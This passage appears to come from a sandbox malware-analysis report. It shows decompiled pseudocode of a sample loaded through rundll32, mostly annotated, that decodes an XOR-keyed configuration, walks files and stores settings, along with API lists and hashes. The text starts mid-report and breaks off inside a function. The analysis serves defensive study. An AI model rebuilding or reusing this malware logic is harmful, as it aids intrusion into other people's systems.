                                                  • Associated: 0000000C.00000002.327411337.0000000005470000.00000004.00020000.sdmp
                                                  • Associated: 0000000C.00000002.327462101.000000000547C000.00000002.00020000.sdmp
                                                  • Associated: 0000000C.00000002.327502274.000000000547D000.00000004.00020000.sdmp
                                                  • Associated: 0000000C.00000002.327543577.000000000547F000.00000002.00020000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_5470000_rundll32.jbxd
                                                  Similarity
                                                  • API ID: AllocateHandleHeapmemset$CloseCriticalInitializeModuleSectionlstrlenwsprintf
                                                  • String ID:
                                                  • API String ID: 4246211962-0
                                                  • Opcode ID: 0463c6ce1c107b94473fa2a310d5779fdda355d9221da595cd53cb59c08aa1d2
                                                  • Instruction ID: c830ce3a947aee9234f36231ce2323584afe152afe2d51af8299c982ae2183c8
                                                  • Opcode Fuzzy Hash: 0463c6ce1c107b94473fa2a310d5779fdda355d9221da595cd53cb59c08aa1d2
                                                  • Instruction Fuzzy Hash: 1851BA75F2421D9BDB289BB5DC49EEF3BA9BF04604F0044ABF501E7240EBB4D9459B50
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  C-Code - Quality: 53%
                                                  			E054794A9(char* __eax) {
                                                  				char* _t8;
                                                  				intOrPtr _t12;
                                                  				char* _t21;
                                                  				signed int _t23;
                                                  				char* _t24;
                                                  				signed int _t26;
                                                  				void* _t27;
                                                  
                                                  				_t21 = __eax;
                                                  				_push(0x20);
                                                  				_t23 = 1;
                                                  				_push(__eax);
                                                  				while(1) {
                                                  					_t8 = StrChrA();
                                                  					if(_t8 == 0) {
                                                  						break;
                                                  					}
                                                  					_t23 = _t23 + 1;
                                                  					_push(0x20);
                                                  					_push( &(_t8[1]));
                                                  				}
                                                  				_t12 = E05472049(_t23 << 2);
                                                  				 *((intOrPtr*)(_t27 + 0x10)) = _t12;
                                                  				if(_t12 != 0) {
                                                  					StrTrimA(_t21, 0x547c2a4); // executed
                                                  					_t26 = 0;
                                                  					do {
                                                  						_t24 = StrChrA(_t21, 0x20);
                                                  						if(_t24 != 0) {
                                                  							 *_t24 = 0;
                                                  							_t24 =  &(_t24[1]);
                                                  							StrTrimA(_t24, 0x547c2a4);
                                                  						}
                                                  						 *( *((intOrPtr*)(_t27 + 0x10)) + _t26 * 4) = _t21;
                                                  						_t26 = _t26 + 1;
                                                  						_t21 = _t24;
                                                  					} while (_t24 != 0);
                                                  					 *((intOrPtr*)( *((intOrPtr*)(_t27 + 0x18)))) =  *((intOrPtr*)(_t27 + 0x10));
                                                  				}
                                                  				return 0;
                                                  			}


                                                  APIs
                                                  • StrChrA.SHLWAPI(?,00000020,00000000,073E95AC,?,054723DE,?,05477634,073E95AC,?,054723DE), ref: 054794C3
                                                  • StrTrimA.KERNELBASE(?,0547C2A4,00000002,?,054723DE,?,05477634,073E95AC,?,054723DE), ref: 054794E2
                                                  • StrChrA.SHLWAPI(?,00000020,?,054723DE,?,05477634,073E95AC,?,054723DE), ref: 054794ED
                                                  • StrTrimA.SHLWAPI(00000001,0547C2A4,?,054723DE,?,05477634,073E95AC,?,054723DE), ref: 054794FF
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.327430811.0000000005471000.00000020.00020000.sdmp, Offset: 05470000, based on PE: true
                                                  • Associated: 0000000C.00000002.327411337.0000000005470000.00000004.00020000.sdmp
                                                  • Associated: 0000000C.00000002.327462101.000000000547C000.00000002.00020000.sdmp
                                                  • Associated: 0000000C.00000002.327502274.000000000547D000.00000004.00020000.sdmp
                                                  • Associated: 0000000C.00000002.327543577.000000000547F000.00000002.00020000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_5470000_rundll32.jbxd
                                                  Similarity
                                                  • API ID: Trim
                                                  • String ID:
                                                  • API String ID: 3043112668-0
                                                  • Opcode ID: 352e20b7473d419cb8a55dca8b83f7ab7fc53f54e39b5836b1f7fe71dadc50cb
                                                  • Instruction ID: 4d5889cf8b1aef980e786c160a9a69742aa80dad1455e6087f485b0905bc4f2e
                                                  • Opcode Fuzzy Hash: 352e20b7473d419cb8a55dca8b83f7ab7fc53f54e39b5836b1f7fe71dadc50cb
                                                  • Instruction Fuzzy Hash: BB01B572A093296FD230DE698C49FFB7F98FF86650F11055AF941C7340DB60C80196A0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  C-Code - Quality: 90%
                                                  			E05473DD9(void* __eflags, int _a4) {
                                                  				intOrPtr _v12;
                                                  				WCHAR* _v16;
                                                  				char* _v20;
                                                  				int _v24;
                                                  				void* _v36;
                                                  				char _v40;
                                                  				char _v68;
                                                  				char _v72;
                                                  				char _v76;
                                                  				char _v80;
                                                  				void _v84;
                                                  				char _v88;
                                                  				void* __ebx;
                                                  				void* __esi;
                                                  				intOrPtr _t40;
                                                  				int _t45;
                                                  				intOrPtr _t50;
                                                  				intOrPtr _t52;
                                                  				void* _t55;
                                                  				intOrPtr _t67;
                                                  				void* _t70;
                                                  				void* _t80;
                                                  				WCHAR* _t85;
                                                  
                                                  				_v88 = 0;
                                                  				memset( &_v84, 0, 0x2c);
                                                  				_v40 = 0;
                                                  				asm("stosd");
                                                  				asm("stosd");
                                                  				asm("stosd");
                                                  				asm("stosd");
                                                  				asm("stosd");
                                                  				_t40 =  *0x547d27c; // 0x1f6a5a8
                                                  				_t5 = _t40 + 0x547ee40; // 0x410025
                                                  				_t85 = E05476A12(_t5);
                                                  				_v16 = _t85;
                                                  				if(_t85 == 0) {
                                                  					_t80 = 8;
                                                  					L24:
                                                  					return _t80;
                                                  				}
                                                  				_t45 = StrCmpNIW(_t85, _a4, lstrlenW(_t85)); // executed
                                                  				if(_t45 != 0) {
                                                  					_t80 = 1;
                                                  					L22:
                                                  					E05479039(_v16);
                                                  					goto L24;
                                                  				}
                                                  				if(E0547A72D(0,  &_a4) != 0) {
                                                  					_a4 = 0;
                                                  				}
                                                  				_t50 = E0547809F(0,  *0x547d33c);
                                                  				_v12 = _t50;
                                                  				if(_t50 == 0) {
                                                  					_t80 = 8;
                                                  					goto L19;
                                                  				} else {
                                                  					_t52 =  *0x547d27c; // 0x1f6a5a8
                                                  					_t11 = _t52 + 0x547e81a; // 0x65696c43
                                                  					_t55 = E0547809F(0, _t11);
                                                  					_t87 = _t55;
                                                  					if(_t55 == 0) {
                                                  						_t80 = 8;
                                                  					} else {
                                                  						_t80 = E05476BFA(_a4, 0x80000001, _v12, _t87,  &_v88,  &_v84);
                                                  						E05479039(_t87);
                                                  					}
                                                  					if(_t80 != 0) {
                                                  						L17:
                                                  						E05479039(_v12);
                                                  						L19:
                                                  						_t86 = _a4;
                                                  						if(_a4 != 0) {
                                                  							E05471F99(_t86);
                                                  						}
                                                  						goto L22;
                                                  					} else {
                                                  						if(( *0x547d260 & 0x00000001) == 0) {
                                                  							L14:
                                                  							E05478F83(_t80, _v88, _v84,  *0x547d270, 0);
                                                  							_t80 = E05471C74(_v88,  &_v80,  &_v76, 0);
                                                  							if(_t80 == 0) {
                                                  								_v24 = _a4;
                                                  								_v20 =  &_v88;
                                                  								_t80 = E054742EA( &_v40, 0);
                                                  							}
                                                  							E05479039(_v88);
                                                  							goto L17;
                                                  						}
                                                  						_t67 =  *0x547d27c; // 0x1f6a5a8
                                                  						_t18 = _t67 + 0x547e823; // 0x65696c43
                                                  						_t70 = E0547809F(0, _t18);
                                                  						_t89 = _t70;
                                                  						if(_t70 == 0) {
                                                  							_t80 = 8;
                                                  						} else {
                                                  							_t80 = E05476BFA(_a4, 0x80000001, _v12, _t89,  &_v72,  &_v68);
                                                  							E05479039(_t89);
                                                  						}
                                                  						if(_t80 != 0) {
                                                  							goto L17;
                                                  						} else {
                                                  							goto L14;
                                                  						}
                                                  					}
                                                  				}
                                                  			}

                                                  APIs
                                                  • memset.NTDLL ref: 05473DEE
                                                    • Part of subcall function 05476A12: ExpandEnvironmentStringsW.KERNEL32(00000000,00000000,00000000,?,?,00000000,05473E14,00410025,00000005,?,00000000), ref: 05476A23
                                                    • Part of subcall function 05476A12: ExpandEnvironmentStringsW.KERNEL32(?,00000000,00000000,00000000), ref: 05476A40
                                                  • lstrlenW.KERNEL32(00000000,00410025,00000005,?,00000000), ref: 05473E22
                                                  • StrCmpNIW.KERNELBASE(00000000,00000000,00000000), ref: 05473E2D
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.327430811.0000000005471000.00000020.00020000.sdmp, Offset: 05470000, based on PE: true
                                                  • Associated: 0000000C.00000002.327411337.0000000005470000.00000004.00020000.sdmp
                                                  • Associated: 0000000C.00000002.327462101.000000000547C000.00000002.00020000.sdmp
                                                  • Associated: 0000000C.00000002.327502274.000000000547D000.00000004.00020000.sdmp
                                                  • Associated: 0000000C.00000002.327543577.000000000547F000.00000002.00020000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_5470000_rundll32.jbxd
                                                  Similarity
                                                  • API ID: EnvironmentExpandStrings$lstrlenmemset
                                                  • String ID:
                                                  • API String ID: 3817122888-0
                                                  • Opcode ID: e197eafe5bb4fccacf62f36b6c9527a0dae17baa57865baa9030678361769bba
                                                  • Instruction ID: 932e712f1358156a524547ab21630f5caefdd653fa4afaffc7faffc8339e9932
                                                  • Opcode Fuzzy Hash: e197eafe5bb4fccacf62f36b6c9527a0dae17baa57865baa9030678361769bba
                                                  • Instruction Fuzzy Hash: 88414C72A1121CAEDB11EEE5CC88DEF7BBDBF08240B00456BF515AB210DA71DA459B90
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  C-Code - Quality: 100%
                                                  			_entry_(intOrPtr _a4, intOrPtr _a8) {
                                                  				intOrPtr _t4;
                                                  				void* _t10;
                                                  				void* _t11;
                                                  				void* _t12;
                                                  				void* _t14;
                                                  
                                                  				_t14 = 1;
                                                  				_t4 = _a8;
                                                  				if(_t4 == 0) {
                                                  					if(InterlockedDecrement(0x547d23c) == 0) {
                                                  						E0547970F();
                                                  					}
                                                  				} else {
                                                  					if(_t4 == 1 && InterlockedIncrement(0x547d23c) == 1) {
                                                  						_t10 = E05476A56(_t11, _t12, _a4); // executed
                                                  						if(_t10 != 0) {
                                                  							_t14 = 0;
                                                  						}
                                                  					}
                                                  				}
                                                  				return _t14;
                                                  			}

                                                  APIs
                                                  • InterlockedIncrement.KERNEL32(0547D23C), ref: 0547806A
                                                    • Part of subcall function 05476A56: HeapCreate.KERNELBASE(00000000,00400000,00000000,?,00000001,?,?,?,0547807D,?), ref: 05476A69
                                                  • InterlockedDecrement.KERNEL32(0547D23C), ref: 0547808A
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.327430811.0000000005471000.00000020.00020000.sdmp, Offset: 05470000, based on PE: true
                                                  • Associated: 0000000C.00000002.327411337.0000000005470000.00000004.00020000.sdmp
                                                  • Associated: 0000000C.00000002.327462101.000000000547C000.00000002.00020000.sdmp
                                                  • Associated: 0000000C.00000002.327502274.000000000547D000.00000004.00020000.sdmp
                                                  • Associated: 0000000C.00000002.327543577.000000000547F000.00000002.00020000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_5470000_rundll32.jbxd
                                                  Similarity
                                                  • API ID: Interlocked$CreateDecrementHeapIncrement
                                                  • String ID:
                                                  • API String ID: 3834848776-0
                                                  • Opcode ID: bf334d89559618ad79bca68bf68581d7496827cf78ebf8ce43ad2d40798d6adc
                                                  • Instruction ID: d5d0bd912213677b93fdb807bd7b0f54c52179c09b09d3f57b8ac938fac09ade
                                                  • Opcode Fuzzy Hash: bf334d89559618ad79bca68bf68581d7496827cf78ebf8ce43ad2d40798d6adc
                                                  • Instruction Fuzzy Hash: 94E026343242AD5382346BB4884CFEFAF0ABF00A80F03445BF785D0160CA20C8819AD2
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  C-Code - Quality: 87%
                                                  			E054773FD(void* __edx) {
                                                  				char _v8;
                                                  				char _v12;
                                                  				void* _v16;
                                                  				void* __esi;
                                                  				void* _t23;
                                                  				intOrPtr _t24;
                                                  				intOrPtr _t32;
                                                  				intOrPtr _t35;
                                                  				intOrPtr _t38;
                                                  				intOrPtr _t42;
                                                  				void* _t45;
                                                  				void* _t50;
                                                  				void* _t55;
                                                  
                                                  				_t50 = __edx;
                                                  				_v12 = 0;
                                                  				_t23 = E0547A72D(0,  &_v8); // executed
                                                  				if(_t23 != 0) {
                                                  					_v8 = 0;
                                                  				}
                                                  				_t24 =  *0x547d27c; // 0x1f6a5a8
                                                  				_t4 = _t24 + 0x547ede0; // 0x73e9388
                                                  				_t5 = _t24 + 0x547ed88; // 0x4f0053
                                                  				_t45 = E05471262( &_v16, _v8, _t5, _t4);
                                                  				if(_t45 == 0) {
                                                  					 *0x547d0f4(_v16, 0,  &_v12);
                                                  					_t45 = 8;
                                                  					if(_v12 < _t45) {
                                                  						_t45 = 1;
                                                  						__eflags = 1;
                                                  					} else {
                                                  						_t32 =  *0x547d27c; // 0x1f6a5a8
                                                  						_t11 = _t32 + 0x547edd4; // 0x73e937c
                                                  						_t48 = _t11;
                                                  						_t12 = _t32 + 0x547ed88; // 0x4f0053
                                                  						_t55 = E05477CB8(_t11, _t12, _t11);
                                                  						_t59 = _t55;
                                                  						if(_t55 != 0) {
                                                  							_t35 =  *0x547d27c; // 0x1f6a5a8
                                                  							_t13 = _t35 + 0x547ee1e; // 0x30314549
                                                  							if(E054789D6(_t48, _t50, _t59, _v8, _t55, _t13, 0x14) == 0) {
                                                  								_t61 =  *0x547d25c - 6;
                                                  								if( *0x547d25c <= 6) {
                                                  									_t42 =  *0x547d27c; // 0x1f6a5a8
                                                  									_t15 = _t42 + 0x547ec2a; // 0x52384549
                                                  									E054789D6(_t48, _t50, _t61, _v8, _t55, _t15, 0x13);
                                                  								}
                                                  							}
                                                  							_t38 =  *0x547d27c; // 0x1f6a5a8
                                                  							_t17 = _t38 + 0x547ee18; // 0x73e93c0
                                                  							_t18 = _t38 + 0x547edf0; // 0x680043
                                                  							_t45 = E05472659(_v8, 0x80000001, _t55, _t18, _t17);
                                                  							HeapFree( *0x547d238, 0, _t55);
                                                  						}
                                                  					}
                                                  					HeapFree( *0x547d238, 0, _v16);
                                                  				}
                                                  				_t54 = _v8;
                                                  				if(_v8 != 0) {
                                                  					E05471F99(_t54);
                                                  				}
                                                  				return _t45;
                                                  			}

                                                  APIs
                                                  • HeapFree.KERNEL32(00000000,00000000,?,80000001,00000000,00680043,073E93C0,?,00000000,30314549,00000014,004F0053,073E937C), ref: 054774E9
                                                  • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,05476814), ref: 054774FB
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.327430811.0000000005471000.00000020.00020000.sdmp, Offset: 05470000, based on PE: true
                                                  • Associated: 0000000C.00000002.327411337.0000000005470000.00000004.00020000.sdmp
                                                  • Associated: 0000000C.00000002.327462101.000000000547C000.00000002.00020000.sdmp
                                                  • Associated: 0000000C.00000002.327502274.000000000547D000.00000004.00020000.sdmp
                                                  • Associated: 0000000C.00000002.327543577.000000000547F000.00000002.00020000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_5470000_rundll32.jbxd
                                                  Similarity
                                                  • API ID: FreeHeap
                                                  • String ID:
                                                  • API String ID: 3298025750-0
                                                  • Opcode ID: f3a72237dffabf83438e2fca2ba1231770ee347a9ea5d68235b7273040ac499b
                                                  • Instruction ID: 4d0d59f6ad15576af7db78d2c90172d4a85dacae3934d8df494b5f13db6a7a2a
                                                  • Opcode Fuzzy Hash: f3a72237dffabf83438e2fca2ba1231770ee347a9ea5d68235b7273040ac499b
                                                  • Instruction Fuzzy Hash: FD31C171A1010DBFDF15DBA1DC89DEA7FBCEF04214F4401A6B600A7220D7709E25DB60
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

C-Code - Quality: 70%
			E054721CD(void* __ecx, signed char* _a4) {
				void* _v8;
				void* _t8;
				signed short _t11;
				signed int _t12;
				signed int _t14;
				intOrPtr _t15;
				void* _t19;
				signed short* _t22;
				void* _t24;
				intOrPtr* _t27;

				_t24 = 0;                       // number of strings collected so far
				_push(0);
				_t19 = 1;                       // return value, 1 = success
				_t27 = 0x547d330;               // destination: a table of three wide-string pointers
				// E054784D5(0) here and E054784D5(1) before every exit. Its subcall resolves an
				// export whose name starts with "Wow6" via GetProcAddress (see APIs below), which
				// is consistent with toggling WOW64 file-system redirection around the file walk;
				// the page does not show the full export name.
				E054784D5();
				while(1) {
					// E054712D4 builds an ANSI path in a heap buffer returned through _v8
					// (RtlAllocateHeap, CreateFileA, GetFileTime, FindFirstFileA; see APIs below)
					_t8 = E054712D4(_a4,  &_v8); // executed
					if(_t8 == 0) {
						break;                  // no more entries: failure path below
					}
					_push(_v8);
					_t14 = 0xd;
					_t15 = E0547809F(_t14);     // ANSI -> wide copy (lstrlen / mbstowcs, see APIs below)
					if(_t15 == 0) {
						HeapFree( *0x547d238, 0, _v8);   // conversion failed: release the ANSI buffer
						break;
					}
					 *_t27 = _t15;              // store the wide string and advance to the next slot
					_t27 = _t27 + 4;
					_t24 = _t24 + 1;
					if(_t24 < 3) {
						continue;               // collect exactly three strings
					}
					L7:
					_push(1);
					E054784D5();
					if(_t19 != 0) {
						// Success: upper-case the first character of the third string
						// (0x547d338 = 0x547d330 + 8) if it is an ASCII lowercase letter
						_t22 =  *0x547d338; // 0x73e9b70
						_t11 =  *_t22 & 0x0000ffff;
						if(_t11 < 0x61 || _t11 > 0x7a) {
							_t12 = _t11 & 0x0000ffff;           // not 'a'..'z': unchanged
						} else {
							_t12 = (_t11 & 0x0000ffff) - 0x20;  // 'a'..'z' -> 'A'..'Z'
						}
						 *_t22 = _t12;
					}
					return _t19;
				}
				_t19 = 0;                       // fewer than three strings: return 0
				goto L7;
			}













Instruction addresses for the listing above (a side column in the original, one address per decompiled line, 0x00000000 for synthesized lines): 0x054721d5 .. 0x05472258.

                                                  APIs
                                                    • Part of subcall function 054784D5: GetProcAddress.KERNEL32(36776F57,054721E5), ref: 054784F0
                                                    • Part of subcall function 054712D4: RtlAllocateHeap.NTDLL(00000000,63699BC3,00000000), ref: 054712FF
                                                    • Part of subcall function 054712D4: RtlAllocateHeap.NTDLL(00000000,63699BC3), ref: 05471321
                                                    • Part of subcall function 054712D4: memset.NTDLL ref: 0547133B
                                                    • Part of subcall function 054712D4: CreateFileA.KERNELBASE(00000000,80000000,00000001,00000000,00000003,00000080,00000000,73797325), ref: 05471379
                                                    • Part of subcall function 054712D4: GetFileTime.KERNEL32(00000000,?,00000000,00000000), ref: 0547138D
                                                    • Part of subcall function 054712D4: FindCloseChangeNotification.KERNELBASE(00000000), ref: 054713A4
                                                    • Part of subcall function 054712D4: StrRChrA.SHLWAPI(?,00000000,0000005C), ref: 054713B0
                                                    • Part of subcall function 054712D4: lstrcat.KERNEL32(?,642E2A5C), ref: 054713F1
                                                    • Part of subcall function 054712D4: FindFirstFileA.KERNELBASE(?,?), ref: 05471407
                                                    • Part of subcall function 0547809F: lstrlen.KERNEL32(?,00000000,0547D330,00000001,05472200,0547D00C,0547D00C,00000000,00000005,00000000,00000000,?,?,?,054796C1,054723E9), ref: 054780A8
                                                    • Part of subcall function 0547809F: mbstowcs.NTDLL ref: 054780CF
                                                    • Part of subcall function 0547809F: memset.NTDLL ref: 054780E1
                                                  • HeapFree.KERNEL32(00000000,0547D00C,0547D00C,0547D00C,00000000,00000005,00000000,00000000,?,?,?,054796C1,054723E9,0547D00C,?,054723E9), ref: 0547221C
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.327430811.0000000005471000.00000020.00020000.sdmp, Offset: 05470000, based on PE: true
                                                  • Associated: 0000000C.00000002.327411337.0000000005470000.00000004.00020000.sdmp Download File
                                                  • Associated: 0000000C.00000002.327462101.000000000547C000.00000002.00020000.sdmp Download File
                                                  • Associated: 0000000C.00000002.327502274.000000000547D000.00000004.00020000.sdmp Download File
                                                  • Associated: 0000000C.00000002.327543577.000000000547F000.00000002.00020000.sdmp Download File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_5470000_rundll32.jbxd
                                                  Similarity
                                                  • API ID: FileHeap$AllocateFindmemset$AddressChangeCloseCreateFirstFreeNotificationProcTimelstrcatlstrlenmbstowcs
                                                  • String ID:
                                                  • API String ID: 983081259-0
                                                  • Opcode ID: e1bb51aac34c934617e197fc075792940e5e60c624430ecb6b834314f18ba12e
                                                  • Instruction ID: 19f179cdd2860989fe2afa7c062983786db315e6f6d8b9e323c1933ff71ac662
                                                  • Opcode Fuzzy Hash: e1bb51aac34c934617e197fc075792940e5e60c624430ecb6b834314f18ba12e
                                                  • Instruction Fuzzy Hash: FB01283971820CBAE7089EE6CD84FEB76A9FF45264F40007BBA45D6190DBE5DC429760
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Non-executed Functions

C-Code - Quality: 92%
			E05474094(int* __ecx) {
				int _v8;
				void* _v12;
				void* __esi;
				signed int _t20;
				signed int _t25;
				char* _t31;
				char* _t32;
				char* _t33;
				char* _t34;
				char* _t35;
				void* _t36;
				void* _t37;
				void* _t38;
				intOrPtr _t39;
				void* _t41;
				intOrPtr _t42;
				intOrPtr _t43;
				signed int _t46;
				intOrPtr _t49;
				signed int _t50;
				signed int _t55;
				void* _t57;
				void* _t58;
				signed int _t60;
				signed int _t64;
				signed int _t68;
				signed int _t72;
				signed int _t76;
				signed int _t80;
				void* _t85;
				intOrPtr _t102;

				_t86 = __ecx;
				// Every lookup in this function keys on the per-sample XOR seed stored at
				// 0x547d278 (0x63699bc3 in this dump) combined with a fixed constant.
				// E05478748 returns the matching data block in _v12 and its size in _v8.
				_t20 =  *0x547d278; // 0x63699bc3
				if(E05478748( &_v12,  &_v8, _t20 ^ 0x8241c5a7) != 0 && _v8 >= 0x90) {
					 *0x547d2d4 = _v12;         // first block is kept only if it is at least 0x90 bytes
				}
				_t25 =  *0x547d278; // 0x63699bc3
				if(E05478748( &_v12,  &_v8, _t25 ^ 0xecd84622) == 0) {
					_push(2);                   // push 2 / pop: the decompiler's rendering of loading
					_pop(0);                    // the constant 2 before the exit at L60 (block missing)
					goto L60;
				} else {
					_t85 = _v12;                // configuration block
					if(_t85 == 0) {
						_t31 = 0;
					} else {
						// E05473F7C returns the value of the field whose hashed name is seed ^ constant
						_t80 =  *0x547d278; // 0x63699bc3
						_t31 = E05473F7C(_t86, _t85, _t80 ^ 0x724e87bc);
					}
					if(_t31 != 0) {
						_t86 =  &_v8;
						// StrToIntExA with flags 0 parses a decimal string; the result lands in a global.
						// The same field -> StrToIntExA -> global pattern repeats four more times below.
						if(StrToIntExA(_t31, 0,  &_v8) != 0) {
							 *0x547d240 = _v8;
						}
					}
					if(_t85 == 0) {
						_t32 = 0;
					} else {
						_t76 =  *0x547d278; // 0x63699bc3
						_t32 = E05473F7C(_t86, _t85, _t76 ^ 0x2b40cc40);
					}
					if(_t32 != 0) {
						_t86 =  &_v8;
						if(StrToIntExA(_t32, 0,  &_v8) != 0) {
							 *0x547d244 = _v8;
						}
					}
					if(_t85 == 0) {
						_t33 = 0;
					} else {
						_t72 =  *0x547d278; // 0x63699bc3
						_t33 = E05473F7C(_t86, _t85, _t72 ^ 0x3b27c2e6);
					}
					if(_t33 != 0) {
						_t86 =  &_v8;
						if(StrToIntExA(_t33, 0,  &_v8) != 0) {
							 *0x547d248 = _v8;
						}
					}
					if(_t85 == 0) {
						_t34 = 0;
					} else {
						_t68 =  *0x547d278; // 0x63699bc3
						_t34 = E05473F7C(_t86, _t85, _t68 ^ 0x0602e249);
					}
					if(_t34 != 0) {
						_t86 =  &_v8;
						if(StrToIntExA(_t34, 0,  &_v8) != 0) {
							 *0x547d004 = _v8;
						}
					}
					if(_t85 == 0) {
						_t35 = 0;
					} else {
						_t64 =  *0x547d278; // 0x63699bc3
						_t35 = E05473F7C(_t86, _t85, _t64 ^ 0x3603764c);
					}
					if(_t35 != 0) {
						_t86 =  &_v8;
						if(StrToIntExA(_t35, 0,  &_v8) != 0) {
							 *0x547d02c = _v8;
						}
					}
					// From here on the fields are strings: E05476ED2 copies/converts them
					// (first argument 0x10 or 0) and the result is handed on or stored.
					if(_t85 == 0) {
						_t36 = 0;
					} else {
						_t60 =  *0x547d278; // 0x63699bc3
						_t36 = E05473F7C(_t86, _t85, _t60 ^ 0x2cc1f2fd);
					}
					if(_t36 != 0) {
						_push(_t36);
						_t57 = 0x10;
						_t58 = E05476ED2(_t57);
						if(_t58 != 0) {
							_push(_t58);
							E0547A5D6();
						}
					}
					if(_t85 == 0) {
						_t37 = 0;
					} else {
						_t55 =  *0x547d278; // 0x63699bc3
						_t37 = E05473F7C(_t86, _t85, _t55 ^ 0xb30fc035);
					}
					if(_t37 != 0 && E05476ED2(0, _t37) != 0) {
						_t102 =  *0x547d32c; // 0x73e95b0
						E054775E9(_t102 + 4, _t53);   // _t53 is left undefined by the decompiler
					}
					if(_t85 == 0) {
						_t38 = 0;
					} else {
						_t50 =  *0x547d278; // 0x63699bc3
						_t38 = E05473F7C(_t86, _t85, _t50 ^ 0x372ab5b7);
					}
					if(_t38 == 0) {
						L51:
						// Field absent or conversion failed: fall back to a string embedded in the
						// image, relocated by the base stored at 0x547d27c. Its first four bytes,
						// 0x616d692f, read as little-endian ASCII "/ima".
						_t39 =  *0x547d27c; // 0x1f6a5a8
						_t18 = _t39 + 0x547e252; // 0x616d692f
						 *0x547d2d0 = _t18;
						goto L52;
					} else {
						_t49 = E05476ED2(0, _t38);
						 *0x547d2d0 = _t49;
						if(_t49 != 0) {
							L52:
							if(_t85 == 0) {
								_t41 = 0;
							} else {
								_t46 =  *0x547d278; // 0x63699bc3
								_t41 = E05473F7C(_t86, _t85, _t46 ^ 0xd8dc5cde);
							}
							if(_t41 == 0) {
								// Same fallback for the second string; 0x6976612e reads as ".avi"
								_t42 =  *0x547d27c; // 0x1f6a5a8
								_t19 = _t42 + 0x547e791; // 0x6976612e
								_t43 = _t19;
							} else {
								_t43 = E05476ED2(0, _t41);
							}
							 *0x547d340 = _t43;
							HeapFree( *0x547d238, 0, _t85);   // release the configuration block
							L60:
							return 0;
						}
						goto L51;
					}
				}
			}


































Instruction addresses for the listing above (a side column in the original, one address per decompiled line, 0x00000000 for synthesized lines): 0x05474094 .. 0x054742e9.

                                                  APIs
                                                  • StrToIntExA.SHLWAPI(00000000,00000000,?,054723DE,?,63699BC3,054723DE,?,63699BC3,00000005,0547D00C,00000008,?,054723DE), ref: 05474119
                                                  • StrToIntExA.SHLWAPI(00000000,00000000,?,054723DE,?,63699BC3,054723DE,?,63699BC3,00000005,0547D00C,00000008,?,054723DE), ref: 0547414B
                                                  • StrToIntExA.SHLWAPI(00000000,00000000,?,054723DE,?,63699BC3,054723DE,?,63699BC3,00000005,0547D00C,00000008,?,054723DE), ref: 0547417D
                                                  • StrToIntExA.SHLWAPI(00000000,00000000,?,054723DE,?,63699BC3,054723DE,?,63699BC3,00000005,0547D00C,00000008,?,054723DE), ref: 054741AF
                                                  • StrToIntExA.SHLWAPI(00000000,00000000,?,054723DE,?,63699BC3,054723DE,?,63699BC3,00000005,0547D00C,00000008,?,054723DE), ref: 054741E1
                                                  • HeapFree.KERNEL32(00000000,054723DE,054723DE,?,63699BC3,054723DE,?,63699BC3,00000005,0547D00C,00000008,?,054723DE), ref: 054742D8
                                                  Memory Dump Source
                                                  • Source File: 0000000C.00000002.327430811.0000000005471000.00000020.00020000.sdmp, Offset: 05470000, based on PE: true
• Associated: 0000000C.00000002.327411337.0000000005470000.00000004.00020000.sdmp
• Associated: 0000000C.00000002.327462101.000000000547C000.00000002.00020000.sdmp
• Associated: 0000000C.00000002.327502274.000000000547D000.00000004.00020000.sdmp
• Associated: 0000000C.00000002.327543577.000000000547F000.00000002.00020000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_12_2_5470000_rundll32.jbxd
                                                  Similarity
                                                  • API ID: FreeHeap
                                                  • String ID:
                                                  • API String ID: 3298025750-0
                                                  • Opcode ID: 36edddc385efea8d8e37d6c94d59879a55a59b5457027850d28ad3175ddca5f7
                                                  • Instruction ID: e3a5c5c8b8472ea665f295bffd5a00f340d26cb15174359c0be56a2707d76a75
                                                  • Opcode Fuzzy Hash: 36edddc385efea8d8e37d6c94d59879a55a59b5457027850d28ad3175ddca5f7
                                                  • Instruction Fuzzy Hash: 666152B0B2411CAADF18EFB5DD899FB7BEDEB48250B644E57A502D7204EE30D9428720
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 66%
                                                  			E0547A279(long __eax, void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a12, void* _a16, void* _a24, intOrPtr _a32) {
                                                  				intOrPtr _v0;
                                                  				intOrPtr _v4;
                                                  				intOrPtr _v16;
                                                  				intOrPtr _v24;
                                                  				intOrPtr _v28;
                                                  				void* _v44;
                                                  				intOrPtr _v52;
                                                  				void* __edi;
                                                  				long _t25;
                                                  				intOrPtr _t26;
                                                  				intOrPtr _t27;
                                                  				intOrPtr _t28;
                                                  				intOrPtr _t29;
                                                  				intOrPtr _t30;
                                                  				void* _t33;
                                                  				intOrPtr _t34;
                                                  				int _t37;
                                                  				intOrPtr _t42;
                                                  				intOrPtr _t43;
                                                  				intOrPtr _t50;
                                                  				intOrPtr _t54;
                                                  				intOrPtr* _t56;
                                                  				intOrPtr _t62;
                                                  				intOrPtr _t68;
                                                  				intOrPtr _t71;
                                                  				intOrPtr _t74;
